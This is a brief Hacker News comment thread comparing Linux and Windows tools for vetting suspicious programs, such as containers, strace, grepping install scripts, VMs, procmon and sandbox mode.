Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

You have so many more practical options for even amateur security auditing on Linux. You can trivially spin up a temporary OS/chroot/container and run your specimen inside it, or run it under strace and log every system call, or statically sift through an executable for strings like IP addresses in an instant using basic tools. Bash install scripts can simply be grepped. It's an environment that gives the user control by default, and as such it's that much harder for executables to gain the upper hand.

Obviously you don't do that for every binary you run, but you have options if there's something you're a bit suspicious of.



All of those options have Windows analogues though. Windows users can spin a VM, run procmon, and even have access to text editors.


Indeed. "Run a program or browser extension in Sandbox mode" is a great deal easier in Windows than the equivalent in Linux.


If people were doing their due diligence on every binary they execute, malware beyond highly targeted zero-days would be non existent.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: